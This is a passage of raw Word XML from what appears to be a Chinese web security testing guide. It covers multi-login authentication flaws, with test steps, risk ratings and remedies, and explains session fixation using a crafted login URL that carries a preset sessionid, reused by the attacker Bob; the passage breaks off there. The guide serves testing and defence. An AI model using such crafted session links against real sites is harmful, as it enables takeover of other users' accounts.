        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里指定一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ServerName</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名单；同时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UseCanonicalName</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1664E231" w14:textId="7FEDD9BA" w:rsidR="00041170" w:rsidRPr="00041170" w:rsidRDefault="00041170" w:rsidP="00041170">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00041170">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>注意事项：</w:t>
      </w:r>
      <w:r w:rsidRPr="00041170">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39545279" w14:textId="03F0A252" w:rsidR="00196BED" w:rsidRPr="00AD537C" w:rsidRDefault="00CC31EF" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc498434501"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证功能滥用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="72ECC63E" w14:textId="22BBE500" w:rsidR="00196BED" w:rsidRPr="00A82BA3" w:rsidRDefault="00CC31EF" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc498434502"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多点认证缺陷</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="049DF165" w14:textId="77AFB992" w:rsidR="00196BED" w:rsidRPr="00BC7510" w:rsidRDefault="00196BED" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00201465" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统允许多点认证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4259CE" w14:textId="77777777" w:rsidR="00196BED" w:rsidRPr="00BC7510" w:rsidRDefault="00196BED" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7BF5F5" w14:textId="31C6689D" w:rsidR="00196BED" w:rsidRPr="00BC7510" w:rsidRDefault="000B2649" w:rsidP="00BC7510">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用测试账号登录系统；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0A751" w14:textId="52C61D8A" w:rsidR="000B2649" w:rsidRPr="00BC7510" w:rsidRDefault="000B2649" w:rsidP="00BC7510">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时在浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用同一个账号登录系统；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC4646A" w14:textId="03F9EA5F" w:rsidR="005A647D" w:rsidRPr="00BC7510" w:rsidRDefault="005A647D" w:rsidP="00BC7510">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若在多个浏览器中均可登录同一各账号，说明存在多点认证缺陷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137597A8" w14:textId="603F8841" w:rsidR="00196BED" w:rsidRPr="00BC7510" w:rsidRDefault="00C24790" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00196BED" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00BD3FCA" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="00F45742" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在获取到其他用户的账号密码后，</w:t>
      </w:r>
      <w:r w:rsidR="00BD3FCA" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可利用该缺陷在用户</w:t>
      </w:r>
      <w:r w:rsidR="00F45742" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r w:rsidR="00BD3FCA" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidR="00F45742" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且未知</w:t>
      </w:r>
      <w:r w:rsidR="00BD3FCA" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况下</w:t>
      </w:r>
      <w:r w:rsidR="00F45742" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行登录，操作用户账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2147BBE2" w14:textId="77777777" w:rsidR="00196BED" w:rsidRPr="00BC7510" w:rsidRDefault="00196BED" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF9B40" w14:textId="37E02890" w:rsidR="00196BED" w:rsidRPr="00BC7510" w:rsidRDefault="00201465" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：多点登录架构可被绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2A765" w14:textId="668EB5F0" w:rsidR="00201465" w:rsidRPr="00BC7510" w:rsidRDefault="00201465" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：核心系统允许多点登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD6C088" w14:textId="377998CF" w:rsidR="00D71AB4" w:rsidRDefault="00196BED" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="0093003B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，关键业务系统应禁止多点认证。</w:t>
      </w:r>
      <w:r w:rsidR="00D649A9" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当同一账号在其他地方登录时已登录的账号应退出会话，并提示用户账户在其他地区登录，可能存在账号被盗风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D0E7E" w14:textId="5EF51CBF" w:rsidR="00AC33EB" w:rsidRPr="00BC7510" w:rsidRDefault="00AC33EB" w:rsidP="00BC7510">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D3B0EEA" w14:textId="7D1041FB" w:rsidR="00CC31EF" w:rsidRPr="00A82BA3" w:rsidRDefault="00CC31EF" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc498434503"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话固定</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="2894E3E4" w14:textId="77777777" w:rsidR="0073297E" w:rsidRPr="00BC7510" w:rsidRDefault="00CC31EF" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户进入登录页面，但还未登录时，就已经产生了一个</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用户输入信息，登录以后，</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会改变，也就是说没有建立新</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，原来的</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00F5535B" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也没有被销毁）。攻击者事先访问系统并建立一个会话，诱使受害者使用此会话登录系统，然后攻击者再使用该会话访问系统即可登录受害者的账户。</w:t>
      </w:r>
      <w:r w:rsidR="0073297E" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话固定攻击的原理及流程如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F76423" w14:textId="77777777" w:rsidR="0073297E" w:rsidRPr="00BC7510" w:rsidRDefault="0073297E" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EACFD94" wp14:editId="5D88F673">
            <wp:extent cx="4986670" cy="357064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会话固定.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3278" cy="3582540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A90378"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hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匿名访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.buybook.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6DE45"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hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务器与</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立了一个会话，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>sessionid</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>1234567</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B9E870"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rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.buybook.com/login.jsp?sessionid=1234567</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发给了受害者</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716F5B1"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rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接打开此链接，输入自己的用户名和密码登录系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB568F" w14:textId="3C3E64FF" w:rsidR="00CC31EF"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hint="eastAsia"/>
        </w:rPr>
        <w:t>此时</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.buybook.com/viewprofile.jsp?sessionid=1234567</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
